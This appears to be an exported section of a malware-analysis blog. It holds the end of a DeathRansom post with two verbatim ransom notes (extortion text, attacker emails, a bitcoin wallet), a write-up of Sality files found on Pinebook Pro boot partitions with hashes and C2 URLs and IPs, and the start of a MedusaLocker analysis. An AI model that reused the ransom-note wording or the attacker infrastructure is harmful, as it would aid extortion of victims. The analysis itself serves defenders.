class="n">D4</span> <span class="mi">60</span> <span class="mi">6</span><span class="n">A</span> <span class="mi">2</span><span class="n">A</span> <span class="mi">7</span><span class="n">A</span> <span class="mi">90</span> <span class="mi">0</span><span class="n">E</span> <span class="mi">3</span><span class="n">B</span> <span class="mi">44</span> <span class="n">EC</span> <span class="n">AB</span> <span class="n">B6</span> <span class="n">F9</span> <span class="n">B6</span> <span class="n">E4</span> <span class="n">DE</span> <span class="n">F7</span> <span class="mi">7</span><span class="n">D</span> <span class="mi">40</span> <span class="mi">9</span><span class="n">E</span> <span class="mi">9</span><span class="k">C</span> <span class="n">BC</span> <span class="mi">68</span> <span class="mi">37</span> <span class="n">B8</span> <span class="mi">6</span><span class="k">C</span> <span class="mi">97</span> <span class="mi">97</span> <span class="mi">06</span> <span class="mi">87</span> <span class="mi">2</span><span class="n">A</span> <span class="mi">66</span> <span class="n">D4</span> <span class="n">EA</span> <span class="mi">7</span><span class="n">A</span> <span class="n">AD</span> <span class="mi">8</span><span class="n">F</span> <span class="n">DC</span> <span class="mi">96</span> <span class="n">CA</span> <span class="mi">25</span> <span class="n">D3</span> <span class="mi">40</span> <span class="mi">32</span> <span class="n">C5</span> <span class="mi">20</span> <span class="mi">68</span> <span class="mi">64</span> <span class="mi">64</span> <span class="n">CB</span> <span class="mi">76</span> <span class="mi">3</span><span class="n">A</span> <span class="mi">63</span> <span class="n">EE</span> <span class="mi">8</span><span class="k">C</span> <span class="mi">9</span><span class="n">F</span> <span class="n">A1</span> <span class="mi">17</span> <span class="mi">52</span> <span class="n">F3</span>
</pre></div>
<h3>Ransomnote Version 1</h3>
<div class="highlight"><pre><span></span> <span class="o">--=</span> <span class="n">DEATHRANSOM</span> <span class="o">=---</span>
<span class="o">***********************</span><span class="n">UNDER</span> <span class="nb">NO</span> <span class="n">CIRCUMSTANCES</span> <span class="n">DO</span> <span class="n">NOT</span> <span class="n">DELETE</span> <span class="n">THIS</span> <span class="kt">FILE</span><span class="p">,</span> <span class="n">UNTIL</span> <span class="n">ALL</span> <span class="n">YOUR</span> <span class="n">DATA</span> <span class="n">IS</span> <span class="n">RECOVERED</span><span class="o">***********************</span>
<span class="o">*****</span><span class="n">FAILING</span> <span class="n">TO</span> <span class="n">DO</span> <span class="n">SO</span><span class="p">,</span> <span class="n">WILL</span> <span class="n">RESULT</span> <span class="n">IN</span> <span class="n">YOUR</span> <span class="n">SYSTEM</span> <span class="n">CORRUPTION</span><span class="p">,</span> <span class="n">IF</span> <span class="n">THERE</span> <span class="n">ARE</span> <span class="n">DECRYPTION</span> <span class="n">ERRORS</span><span class="o">*****</span>
<span class="n">All</span> <span class="n">your</span> <span class="n">files</span><span class="p">,</span> <span class="n">documents</span><span class="p">,</span> <span class="n">photos</span><span class="p">,</span> <span class="n">databases</span> <span class="n">and</span> <span class="n">other</span> <span class="n">important</span>
<span class="n">files</span> <span class="n">are</span> <span class="n">encrypted</span><span class="p">.</span>
<span class="n">You</span> <span class="n">are</span> <span class="n">not</span> <span class="n">able</span> <span class="n">to</span> <span class="n">decrypt</span> <span class="n">it</span> <span class="n">by</span> <span class="n">yourself</span><span class="o">!</span> <span class="n">The</span> <span class="n">only</span> <span class="n">method</span>
<span class="n">of</span> <span class="n">recovering</span> <span class="n">files</span> <span class="n">is</span> <span class="n">to</span> <span class="n">purchase</span> <span class="n">an</span> <span class="n">unique</span> <span class="n">private</span> <span class="n">key</span><span class="p">.</span>
<span class="n">Only</span> <span class="n">we</span> <span class="n">can</span> <span class="n">give</span> <span class="n">you</span> <span class="n">this</span> <span class="n">key</span> <span class="n">and</span> <span class="n">only</span> <span class="n">we</span> <span class="n">can</span> <span class="n">recover</span> <span class="n">your</span> <span class="n">files</span><span class="p">.</span>
<span class="n">To</span> <span class="n">be</span> <span class="n">sure</span> <span class="n">we</span> <span class="n">have</span> <span class="n">the</span> <span class="n">decryptor</span> <span class="n">and</span> <span class="n">it</span> <span class="n">works</span> <span class="n">you</span> <span class="n">can</span> <span class="n">send</span> <span class="n">an</span>
<span class="n">email</span> <span class="n">death</span><span class="p">@</span><span class="n">firemail</span><span class="p">.</span><span class="n">cc</span> <span class="n">and</span> <span class="n">decrypt</span> <span class="n">one</span> <span class="n">file</span> <span class="k">for</span> <span class="n">free</span><span class="p">.</span> <span class="n">But</span> <span class="n">this</span>
<span class="n">file</span> <span class="n">should</span> <span class="n">be</span> <span class="n">of</span> <span class="n">not</span> <span class="n">valuable</span><span class="o">!</span>
<span class="n">Do</span> <span class="n">you</span> <span class="n">really</span> <span class="n">want</span> <span class="n">to</span> <span class="n">restore</span> <span class="n">your</span> <span class="n">files</span><span class="o">?</span>
<span class="n">Write</span> <span class="n">to</span> <span class="n">email</span>
<span class="n">death</span><span class="p">@</span><span class="n">cumallover</span><span class="p">[.]</span><span class="n">me</span>
<span class="n">death</span><span class="p">@</span><span class="n">firemail</span><span class="p">[.]</span><span class="n">cc</span>
<span class="n">Your</span> <span class="n">LOCK</span><span class="o">-</span><span class="nl">ID</span><span class="p">:</span> <span class="p">[</span><span class="n">Redacted</span> <span class="n">Base64</span><span class="p">]</span>
<span class="o">>>></span><span class="n">How</span> <span class="n">to</span> <span class="n">obtain</span> <span class="nl">bitcoin</span><span class="p">:</span>
<span class="n">The</span> <span class="n">easiest</span> <span class="n">way</span> <span class="n">to</span> <span class="n">buy</span> <span class="n">bitcoins</span> <span class="n">is</span> <span class="n">LocalBitcoins</span> <span class="n">site</span><span class="p">.</span> <span class="n">You</span> <span class="n">have</span> <span class="n">to</span> <span class="k">register</span><span class="p">,</span> <span class="n">click</span> <span class="err">'</span><span class="n">Buy</span> <span class="n">bitcoins</span><span class="err">'</span><span class="p">,</span> <span class="n">and</span> <span class="n">select</span> <span class="n">the</span> <span class="n">seller</span> <span class="n">by</span> <span class="n">payment</span> <span class="n">method</span> <span class="n">and</span> <span class="n">price</span><span class="p">.</span>
<span class="nl">hxxps</span><span class="p">:</span><span class="c1">//localbitcoins[.]com/buy_bitcoins</span>
<span class="n">Also</span> <span class="n">you</span> <span class="n">can</span> <span class="n">find</span> <span class="n">other</span> <span class="n">places</span> <span class="n">to</span> <span class="n">buy</span> <span class="n">Bitcoins</span> <span class="n">and</span> <span class="n">beginners</span> <span class="n">guide</span> <span class="nl">here</span><span class="p">:</span>
<span class="nl">hxxp</span><span class="p">:</span><span class="c1">//www.coindesk[.]com/information/how-can-i-buy-bitcoins/</span>
<span class="o">>>></span> <span class="n">Free</span> <span class="n">decryption</span> <span class="n">as</span> <span class="n">guarantee</span><span class="o">!</span>
<span class="n">Before</span> <span class="n">paying</span> <span class="n">you</span> <span class="n">send</span> <span class="n">us</span> <span class="n">up</span> <span class="n">to</span> <span class="mi">1</span> <span class="n">file</span> <span class="k">for</span> <span class="n">free</span> <span class="n">decryption</span><span class="p">.</span>
<span class="n">We</span> <span class="n">recommeded</span> <span class="n">to</span> <span class="n">send</span> <span class="n">pictures</span><span class="p">,</span> <span class="n">text</span> <span class="n">files</span><span class="p">,</span> <span class="n">sheets</span><span class="p">,</span> <span class="n">etc</span><span class="p">.</span> <span class="p">(</span><span class="n">files</span> <span class="n">no</span> <span class="n">more</span> <span class="n">than</span> <span class="mi">1</span><span class="n">mb</span><span class="p">)</span>
<span class="n">IN</span> <span class="n">ORDER</span> <span class="n">TO</span> <span class="n">PREVENT</span> <span class="n">DATA</span> <span class="nl">DAMAGE</span><span class="p">:</span>
<span class="mf">1.</span> <span class="n">Do</span> <span class="n">not</span> <span class="n">rename</span> <span class="n">encrypted</span> <span class="n">files</span><span class="p">.</span>
<span class="mf">2.</span> <span class="n">Do</span> <span class="n">not</span> <span class="n">try</span> <span class="n">to</span> <span class="n">decrypt</span> <span class="n">your</span> <span class="n">data</span> <span class="n">using</span> <span class="n">third</span> <span class="n">party</span> <span class="n">software</span><span class="p">,</span> <span class="n">it</span> <span class="n">may</span> <span class="n">cause</span> <span class="n">permanent</span> <span class="n">data</span> <span class="n">loss</span><span class="p">.</span>
<span class="mf">3.</span> <span class="n">Decryption</span> <span class="n">of</span> <span class="n">your</span> <span class="n">files</span> <span class="n">with</span> <span class="n">the</span> <span class="n">help</span> <span class="n">of</span> <span class="n">third</span> <span class="n">parties</span> <span class="n">may</span> <span class="n">cause</span> <span class="n">increased</span> <span class="n">price</span> <span class="p">(</span><span class="n">they</span> <span class="n">add</span> <span class="n">their</span> <span class="n">fee</span> <span class="n">to</span>
<span class="n">our</span><span class="p">)</span> <span class="n">or</span> <span class="n">you</span> <span class="n">can</span> <span class="n">become</span> <span class="n">a</span> <span class="n">victim</span> <span class="n">of</span> <span class="n">a</span> <span class="n">scam</span><span class="p">.</span>
</pre></div>
<h3>Ransomnote Version 2</h3>
<div class="highlight"><pre><span></span><span class="vm">?????????????????????????</span><span class="w"></span>
<span class="vm">??????</span><span class="n">DEATHRansom</span><span class="w"> </span><span class="vm">???????</span><span class="w"></span>
<span class="vm">?????????????????????????</span><span class="w"></span>
<span class="n">Hello</span><span class="w"> </span><span class="n">dear</span><span class="w"> </span><span class="n">friend</span><span class="p">,</span><span class="w"></span>
<span class="n">Your</span><span class="w"> </span><span class="n">files</span><span class="w"> </span><span class="n">were</span><span class="w"> </span><span class="n">encrypted</span><span class="err">!</span><span class="w"></span>
<span class="n">You</span><span class="w"> </span><span class="n">have</span><span class="w"> </span><span class="k">only</span><span class="w"> </span><span class="mi">12</span><span class="w"> </span><span class="n">hours</span><span class="w"> </span><span class="k">to</span><span class="w"> </span><span class="n">decrypt</span><span class="w"> </span><span class="n">it</span><span class="w"></span>
<span class="ow">In</span><span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="k">of</span><span class="w"> </span><span class="k">no</span><span class="w"> </span><span class="n">answer</span><span class="w"> </span><span class="n">our</span><span class="w"> </span><span class="n">team</span><span class="w"> </span><span class="n">will</span><span class="w"> </span><span class="k">delete</span><span class="w"> </span><span class="n">your</span><span class="w"> </span><span class="n">decryption</span><span class="w"> </span><span class="n">password</span><span class="w"></span>
<span class="k">Write</span><span class="w"> </span><span class="n">back</span><span class="w"> </span><span class="k">to</span><span class="w"> </span><span class="n">our</span><span class="w"> </span><span class="n">e</span><span class="o">-</span><span class="nl">mail</span><span class="p">:</span><span class="w"> </span><span class="n">deathransom</span><span class="nv">@airmail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">cc</span><span class="w"></span>
<span class="ow">In</span><span class="w"> </span><span class="n">your</span><span class="w"> </span><span class="n">message</span><span class="w"> </span><span class="n">you</span><span class="w"> </span><span class="n">have</span><span class="w"> </span><span class="k">to</span><span class="w"> </span><span class="k">write</span><span class="err">:</span><span class="w"></span>
<span class="mf">1.</span><span class="w"> </span><span class="n">YOU</span><span class="w"> </span><span class="n">LOCK</span><span class="o">-</span><span class="nl">ID</span><span class="p">:</span><span class="w"> </span><span class="n">PUmZiYT3OkC9IpVXHpZFOFzZ5Y7</span><span class="o">+</span><span class="n">dLuV9cYUSZ30UyPLeMPEPO4TZ79CCCbiTpSltqKKBv3oFqgH0O6lyre7hv3CJH9Dj22QqbrG</span><span class="o">/</span><span class="n">TDRsN7I51ByXUmbeXy2O4OFxPXuUBUPiFdevwY</span><span class="o">/</span><span class="mi">9</span><span class="n">KEb1c</span><span class="o">+</span><span class="n">vfP9sDY2i2e5m8rtlFsig7F4ZGPlOPmf</span><span class="o">/</span><span class="n">zxGbP1frxuW</span><span class="o">+</span><span class="n">NA9KUN0eR2C9NSH1AmDZ4rAAvCjmDKgOhCniLiT2UE</span><span class="o">+</span><span class="n">TAIDExPdCHmiKIAg1wEGg4udkRpIpn8BYSr1O</span><span class="o">+</span><span class="n">mFkBCOinIpOHAyAgnraDDjTcqtYAUO3WlglahxoufFQlwml3Sn7g0G1UAgauxSHrHZNsppuiTvCbEFLVjVGSVfsrQFIaINiTldYjjoLM05lNhjIjIW</span><span class="o">+</span><span class="n">TIRFu0PSdp3</span><span class="o">+</span><span class="mi">7</span><span class="n">CdV</span><span class="o">/</span><span class="n">UoRJtpI1qrp</span><span class="o">/</span><span class="n">ltJG5Gn</span><span class="o">+</span><span class="n">q5n2</span><span class="o">/</span><span class="n">fIMnJpkxIXlqlUcmHomfpGxzFcT2x</span><span class="o">+</span><span class="n">hsAQiPmaqXpKZ2dUHjeCHYlMBVIWEj3IzPPp5mxLESliaDT2dU3XS8ONNMfhLa6ObVpg9IZKoFlQFDDMb4o6RtExkfoWSzBLl2GD</span><span class="o">+</span><span class="mi">8</span><span class="n">uHbpQvPPXm4NfSYOhpd2J5rnHZtVUYkg</span><span class="o">+</span><span class="n">k2DrS</span><span class="o">+</span><span class="n">F9FJKRw0OkgMsiVHZAenm2</span><span class="o">+</span><span class="n">u2q38</span><span class="o">/</span><span class="n">D3</span><span class="o">+/</span><span class="n">cPeRns</span><span class="o">/</span><span class="mi">3</span><span class="n">aDg5J8DrUyTPrvZ46d393P9C</span><span class="o">+</span><span class="n">FZzvdF</span><span class="o">+</span><span class="n">d04nxMcg15PdvFXjvfRZEOps1qpwbbuqzO3LtV3MzTmNRFf2LRVQ</span><span class="o">==</span><span class="w"></span>
<span class="mf">2.</span><span class="w"> </span><span class="nc">Time</span><span class="w"> </span><span class="k">when</span><span class="w"> </span><span class="n">you</span><span class="w"> </span><span class="n">have</span><span class="w"> </span><span class="n">paid</span><span class="w"> </span><span class="mf">0.1</span><span class="w"> </span><span class="n">btc</span><span class="w"> </span><span class="k">to</span><span class="w"> </span><span class="n">this</span><span class="w"> </span><span class="n">bitcoin</span><span class="w"> </span><span class="nl">wallet</span><span class="p">:</span><span class="w"></span>
<span class="mi">1</span><span class="n">J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N</span><span class="w"></span>
<span class="k">After</span><span class="w"> </span><span class="n">payment</span><span class="w"> </span><span class="n">our</span><span class="w"> </span><span class="n">team</span><span class="w"> </span><span class="n">will</span><span class="w"> </span><span class="n">decrypt</span><span class="w"> </span><span class="n">your</span><span class="w"> </span><span class="n">files</span><span class="w"> </span><span class="n">immediatly</span><span class="w"></span>
<span class="k">Free</span><span class="w"> </span><span class="n">decryption</span><span class="w"> </span><span class="k">as</span><span class="w"> </span><span class="nl">guarantee</span><span class="p">:</span><span class="w"></span>
<span class="mf">1.</span><span class="w"> </span><span class="k">File</span><span class="w"> </span><span class="n">must</span><span class="w"> </span><span class="n">be</span><span class="w"> </span><span class="k">less</span><span class="w"> </span><span class="k">than</span><span class="w"> </span><span class="mi">1</span><span class="n">MB</span><span class="w"></span>
<span class="mf">2.</span><span class="w"> </span><span class="k">Only</span><span class="w"> </span><span class="p">.</span><span class="n">txt</span><span class="w"> </span><span class="ow">or</span><span class="w"> </span><span class="p">.</span><span class="n">lnk</span><span class="w"> </span><span class="n">files</span><span class="p">,</span><span class="w"> </span><span class="k">no</span><span class="w"> </span><span class="n">databases</span><span class="w"></span>
<span class="mf">3.</span><span class="w"> </span><span class="k">Only</span><span class="w"> </span><span class="mi">1</span><span class="w"> </span><span class="n">files</span><span class="w"></span>
<span class="n">How</span><span class="w"> </span><span class="k">to</span><span class="w"> </span><span class="n">obtain</span><span class="w"> </span><span class="nl">bitcoin</span><span class="p">:</span><span class="w"></span>
<span class="n">The</span><span class="w"> </span><span class="n">easiest</span><span class="w"> </span><span class="n">way</span><span class="w"> </span><span class="k">to</span><span class="w"> </span><span class="n">buy</span><span class="w"> </span><span class="n">bitcoins</span><span class="w"> </span><span class="k">is</span><span class="w"> </span><span class="n">LocalBitcoins</span><span class="w"> </span><span class="n">site</span><span class="p">.</span><span class="w"> </span><span class="n">You</span><span class="w"> </span><span class="n">have</span><span class="w"> </span><span class="k">to</span><span class="w"> </span><span class="n">register</span><span class="p">,</span><span class="w"> </span><span class="n">click</span><span class="w"> </span><span class="s1">'Buy bitcoins'</span><span class="p">,</span><span class="w"> </span><span class="ow">and</span><span class="w"> </span><span class="k">select</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">seller</span><span class="w"> </span><span class="k">by</span><span class="w"> </span><span class="n">payment</span><span class="w"> </span><span class="k">method</span><span class="w"> </span><span class="ow">and</span><span class="w"> </span><span class="n">price</span><span class="p">.</span><span class="w"></span>
<span class="nl">hxxps</span><span class="p">:</span><span class="o">//</span><span class="n">localbitcoins</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="o">/</span><span class="n">buy_bitcoins</span><span class="w"></span>
<span class="n">Also</span><span class="w"> </span><span class="n">you</span><span class="w"> </span><span class="n">can</span><span class="w"> </span><span class="n">find</span><span class="w"> </span><span class="n">other</span><span class="w"> </span><span class="n">places</span><span class="w"> </span><span class="k">to</span><span class="w"> </span><span class="n">buy</span><span class="w"> </span><span class="n">Bitcoins</span><span class="w"> </span><span class="ow">and</span><span class="w"> </span><span class="n">beginners</span><span class="w"> </span><span class="n">guide</span><span class="w"> </span><span class="nl">here</span><span class="p">:</span><span class="w"></span>
<span class="nl">hxxp</span><span class="p">:</span><span class="o">//</span><span class="n">www</span><span class="p">.</span><span class="n">coindesk</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="o">/</span><span class="n">information</span><span class="o">/</span><span class="n">how</span><span class="o">-</span><span class="n">can</span><span class="o">-</span><span class="n">i</span><span class="o">-</span><span class="n">buy</span><span class="o">-</span><span class="n">bitcoins</span><span class="o">/</span><span class="w"></span>
</pre></div>
<p></br></p>
<p>Gallow Icon made by <a href="https://www.flaticon.com/free-icon/gallow_2213639?term=death&page=1&position=11">Freepik</a> from www.flaticon.com</p>About PINEs and supply chain attacks gone wrong2019-11-09T00:00:00+01:002019-11-09T00:00:00+01:00f0wLtag:dissectingmalwa.re,2019-11-09:/about-pines-and-supply-chain-attacks-gone-wrong.html<p>I got myself a Pinebook Pro to run and port OpenBSD on. (Un)fortunatelly it seems like slowly but surely everything I get my hands on has something to do with Malware, so let's have a look what's in store today.</p><p></br></p>
<p><center><img alt="Factory" src="https://dissectingmalwa.re/img/sality-factory.jpg"></center></p>
<p></br></p>
<p>Sality @ <a href="https://app.any.run/tasks/975aa845-30c6-4443-9bd4-b9069a968edb">AnyRun</a> | <a href="https://www.hybrid-analysis.com/sample/37f1b6394a408e0a959b82ff118a526c1362b4ddc1db5da03c9ffa70acaebff4/5dc2e02f0288384a2de46612">HybridAnalysis</a> | <a href="https://www.virustotal.com/gui/file/1c0c8aad037bde4bbf3221a0a8385022c24d5a69d59ef07829ef66a9f6ca7b01/detection">VirusTotal</a>
--> <code>sha256 37f1b6394a408e0a959b82ff118a526c1362b4ddc1db5da03c9ffa70acaebff4</code></p>
<p><em>To all Pinebook Users that may be affected by this Malware: It will not pose any threat to the notebook itself. It will however, potentially infect Windows machines that mount the eMMC storage (which is not a common use case). To remove Sality simply run a system upgrade or run this <a href="https://github.com/mrfixit2001/updates_repo/blob/v1.4/pinebook/filesystem/cleanboot.sh">script</a> manually.</em></p>
<p>On the 3rd of November it was first publicly disclosed by stheo on Twitter that there were unidentified Windows-related files on the boot partition of Pinebook Pro. As the Discussion in the Discord/IRC Chat evolved it became clear that only the second batch (the 64GB eMMC Versions) of the Notebook has to be infected. The initial VirusTotal Analysis revealed that the Files in question were related to the Sality Botnet. Calling this a "supply chain attack" is also pretty clickbaity (I'm sorry :D), but what it boils down to is, that one or more flashing stations in the Factory in China have been infected with Sality. These systems often run outdated software (in this case probably XP or older) and have poor security standards.</p>
<p></br></p>
<p><center><blockquote class="twitter-tweet"><p lang="en" dir="ltr"><a href="https://twitter.com/thepine64?ref_src=twsrc%5Etfw">@thepine64</a> Why do I have a malware called βyvyfr.exeβ with an autorun.inf on my boot partition of my Pinebook Pro ? I have no Windows at home and itβs a fresh install and update of the Pinebook Pro. <br>VT analysis : <a href="https://t.co/Hne9BR15vQ">https://t.co/Hne9BR15vQ</a> <a href="https://t.co/zIHz7sm6VB">pic.twitter.com/zIHz7sm6VB</a></p>— studer (@stheo) <a href="https://twitter.com/stheo/status/1191031857443483649?ref_src=twsrc%5Etfw">November 3, 2019</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script> </center></p>
<p></br></p>
<p>After recieving my Pinebook I immediately opened the Dolphin Filemanager to check <em>/boot</em> and sure enough, there were two files with seemingly random filenames ending in <em>.pif</em> and an <em>autorun.inf</em> file. The other files in this directory are <em>not</em> affiliated with the Sality Botnet: <strong>rk3399-pinebookpro.dtb</strong> is the DTS file, <strong>Image</strong> contains the Kernel (for both of these files there are possibly also Backup files present, marked with a .bak suffix) and the extlinux directory contains files related to the bootloader.</p>
<p></br></p>
<p><center><img alt="On the Pinebook" src="https://dissectingmalwa.re/img/sality-pbp.png"></center></p>
<p></br></p>
<p>I haven't seen a <strong>pif</strong> file in a pretty long time, so I had to refresh my memory a bit as well. PIF stands for "Program information file" and describes certain environmental conditions and settings for a given application. In modern versions of windows this information is stored in <em>.LNK</em> Files. So does it contain shell commands similar to how the GermanWiper stage 1 worked? Quoting <a href="https://en.wikipedia.org/wiki/Program_information_file">Wikipedia</a> here: </p>
<div class="highlight"><pre><span></span><span class="ss">"Although a file in PIF format does not contain any executable code (it lacks executable files' magic number "</span><span class="n">MZ</span><span class="ss">"), Microsoft Windows handles all files with (pseudo-)executables' extensions in the same manner: all .COMs, .EXEs, and .PIFs are analyzed by the ShellExecute function and will run accordingly to their content and not extension, meaning a file with the PIF extension can be used to transmit computer viruses."</span>
</pre></div>
<p>Sounds really interesting π€ So let's throw it into a Hex Editor and ... wait is that a MZ-Header? Looks like we've got an executable here after all.</p>
<p></br></p>
<p><center><img alt="MZ Header" src="https://dissectingmalwa.re/img/sality-mz.png"></center></p>
<p></br></p>
<p>It also looks like at least one of the two EXEs has been padded quite heavily.</p>
<p></br></p>
<p><center><img alt="File padding" src="https://dissectingmalwa.re/img/sality-padd.png"></center></p>
<p></br></p>
<p>Running <em>kithj.exe</em> in AnyRun with standard UAC settings results in the Malware requesting access via injecting into the Desktop Window Manager Process to run at an elevated level and look more legit. </p>
<p></br></p>
<p><center><img alt="Firewall Dialog" src="https://dissectingmalwa.re/img/sality-fw.png"></center></p>
<p></br></p>
<p>Looking at the Process Graph we notice multiple process injections into various system applications (namely the Windows Explorer, Desktop Window Manager, Task Scheduler and WindaNr). </p>
<p></br></p>
<p><center><img alt="Anyrun Process Graph" src="https://dissectingmalwa.re/img/sality-processgraph.png"></center></p>
<p></br></p>
<p>Ghidra can't make much of it with the standard analysis settings and can only find two "functions" in total.</p>
<p></br></p>
<p><center><img alt="Functions detected by Ghidra" src="https://dissectingmalwa.re/img/sality-func.png"></center></p>
<p></br></p>
<h2><em>IOCs</em></h2>
<h3>Sality Hashes</h3>
<div class="highlight"><pre><span></span><span class="n">kithj</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--> SHA256: 37f1b6394a408e0a959b82ff118a526c1362b4ddc1db5da03c9ffa70acaebff4</span>
<span class="n">SSDEEP</span><span class="p">:</span> <span class="mi">3072</span><span class="p">:</span><span class="n">m5y36RPOJTdktKKu37BLgwl7gMt7pwObB</span><span class="p">:</span><span class="n">mQqRQydiBLJl7Jt7N</span>
<span class="n">augjb</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--> SHA256: 6245eb607e53209126191e4b6cdf7d64f52394f6bc6a2a9529a28ed49be19c82</span>
<span class="n">SSDEEP</span><span class="p">:</span> <span class="mi">3072</span><span class="p">:</span><span class="n">EE6sGYXKm</span><span class="o">+</span><span class="n">NFN3GtRM0XS0aGNH3MYaOJEQ</span><span class="o">/</span><span class="n">Xh6</span><span class="p">:</span><span class="n">AsqdWdbaG8YOcx6</span>
<span class="n">autorun</span><span class="p">.</span><span class="n">inf</span> <span class="c1">--> SHA256: f5adcd0989f9c4033fcd214e8998dde85865c6bf178c4eaed94128e6f5389bd6</span>
</pre></div>
<h3>Associated Files</h3>
<div class="highlight"><pre><span></span><span class="n">augjb</span><span class="p">.</span><span class="n">pif</span><span class="p">(.</span><span class="n">exe</span><span class="p">)</span>
<span class="n">kithj</span><span class="p">.</span><span class="n">pif</span><span class="p">(.</span><span class="n">exe</span><span class="p">)</span>
<span class="n">autorun</span><span class="p">.</span><span class="n">inf</span>
</pre></div>
<h3>URLs</h3>
<div class="highlight"><pre><span></span><span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="n">padrup</span><span class="p">[.]</span><span class="n">com</span><span class="p">.</span><span class="n">ds</span><span class="o">/</span><span class="n">sobaka1</span><span class="p">.</span><span class="n">gif</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="n">paaaaad</span><span class="p">[.]</span><span class="n">fd</span><span class="p">.</span><span class="n">fd</span>
</pre></div>
<h3>IPs of contacted Hosts</h3>
<div class="highlight"><pre><span></span><span class="n">IP</span> <span class="o">-</span> <span class="n">Port</span> <span class="o">-</span> <span class="n">exclusively</span> <span class="n">UDP</span>
<span class="mi">118</span><span class="p">.</span><span class="mi">136</span><span class="p">.</span><span class="mi">16</span><span class="p">.</span><span class="mi">138</span> <span class="o">-</span> <span class="mi">5614</span>
<span class="mi">180</span><span class="p">.</span><span class="mi">247</span><span class="p">.</span><span class="mi">53</span><span class="p">.</span><span class="mi">107</span> <span class="o">-</span> <span class="mi">7866</span>
<span class="mi">86</span><span class="p">.</span><span class="mi">107</span><span class="p">.</span><span class="mi">231</span><span class="p">.</span><span class="mi">10</span> <span class="o">-</span> <span class="mi">7534</span>
<span class="mi">93</span><span class="p">.</span><span class="mi">114</span><span class="p">.</span><span class="mi">69</span><span class="p">.</span><span class="mi">232</span> <span class="o">-</span> <span class="mi">5684</span>
<span class="mi">220</span><span class="p">.</span><span class="mi">247</span><span class="p">.</span><span class="mi">166</span><span class="p">.</span><span class="mi">100</span> <span class="o">-</span> <span class="mi">4492</span>
<span class="mi">202</span><span class="p">.</span><span class="mi">177</span><span class="p">.</span><span class="mi">246</span><span class="p">.</span><span class="mi">59</span> <span class="o">-</span> <span class="mi">6715</span>
<span class="mi">189</span><span class="p">.</span><span class="mi">122</span><span class="p">.</span><span class="mi">188</span><span class="p">.</span><span class="mi">39</span> <span class="o">-</span> <span class="mi">7538</span>
<span class="mi">89</span><span class="p">.</span><span class="mi">38</span><span class="p">.</span><span class="mi">237</span><span class="p">.</span><span class="mi">65</span> <span class="o">-</span> <span class="mi">5064</span>
<span class="mi">188</span><span class="p">.</span><span class="mi">215</span><span class="p">.</span><span class="mi">25</span><span class="p">.</span><span class="mi">69</span> <span class="o">-</span> <span class="mi">6310</span>
<span class="mi">14</span><span class="p">.</span><span class="mi">96</span><span class="p">.</span><span class="mi">75</span><span class="p">.</span><span class="mi">194</span> <span class="o">-</span> <span class="mi">6130</span>
<span class="mi">212</span><span class="p">.</span><span class="mi">76</span><span class="p">.</span><span class="mi">78</span><span class="p">.</span><span class="mi">10</span> <span class="o">-</span> <span class="mi">6260</span>
<span class="mi">14</span><span class="p">.</span><span class="mi">98</span><span class="p">.</span><span class="mi">120</span><span class="p">.</span><span class="mi">25</span> <span class="o">-</span> <span class="mi">6740</span>
<span class="mi">112</span><span class="p">.</span><span class="mi">204</span><span class="p">.</span><span class="mi">145</span><span class="p">.</span><span class="mi">248</span> <span class="o">-</span> <span class="mi">5300</span>
<span class="mi">200</span><span class="p">.</span><span class="mi">8</span><span class="p">.</span><span class="mi">145</span><span class="p">.</span><span class="mi">17</span> <span class="o">-</span> <span class="mi">6780</span>
</pre></div>
<p></br></p>Try not to stare - MedusaLocker at a glance2019-11-05T00:00:00+01:002019-11-05T00:00:00+01:00f0wLtag:dissectingmalwa.re,2019-11-05:/try-not-to-stare-medusalocker-at-a-glance.html<p>Mystic but also a new(-ish) threat: Medusa ransomware. Let's take a quick peek, but don't look too close or you may need to fetch backups soon.</p><p><center><img alt="Logo" src="https://dissectingmalwa.re/img/myth.png"></center></p>
<h4><em>A general disclaimer as always: downloading and running the samples linked below will lead to the encryption of your personal data, so be f$cking careful. Also check with your local laws as owning malware binaries/ sources might be illegal depending on where you live.</em></h4>
<p>medusa.exe @ <a href="https://app.any.run/tasks/75bbf936-ab86-4a02-9512-290d130f4c2c/">AnyRun</a>
--> <code>sha256 3a5b015655f3aad4b4fd647aa34fda4ce784d75a20d12a73f8dc0e0d866e7e01</code></p>
<p>dix_16.exe @ <a href="https://www.hybrid-analysis.com/sample/49da42d00cc3ad6379ead2e07fd5f09bd358b144a6e78aad4bb1a8298e2bb568">HybridAnalysis</a>
--> <code>sha256 49da42d00cc3ad6379ead2e07fd5f09bd358b144a6e78aad4bb1a8298e2bb568</code></p>
<p></br></p>
<p>Taking a look at the stringdump that <a href="https://github.com/fireeye/stringsifter">stringsifter</a> produced one of the first things that stood out was this base64 encoded image:</p>
<p><center><img alt="Image Base64 String" src="https://dissectingmalwa.re/img/medusa-image.png"></center></p>
<p></br></p>
<p>After decoding it we get an image of a medieval pest doctor. Fun fact: They wore these masks because they thought it would protect them from the black death. One day someone will probably start selling these for endpoint protection. </p>
<p><center><img alt="Pest Doctor" src="https://dissectingmalwa.re/img/medusa-pngpest.png"></center></p>
<p></br></p>
<p>Another interesting extracted string is this PDB-Path: <em>C:\Users\Gh0St\Desktop\MedusaLockerInfo\MedusaLockerProject\MedusaLocker\Release\MedusaLocker.pdb</em></p>
<p>Running it through Detect it easy returns that MedusaLocker was built with Visual C++ and a (in malware-terms) relatively new Linker Version.
<center><img alt="Detect it easy" src="https://dissectingmalwa.re/img/medusa-die.png"></center></p>
<p>Entropy-wise it doesn't look like this sample is packed and the sections found don't look out of the ordinary either.</p>
<p><center><img alt="medusa.exe Entropy" src="https://dissectingmalwa.re/img/medusa-entropy.png"></center></p>
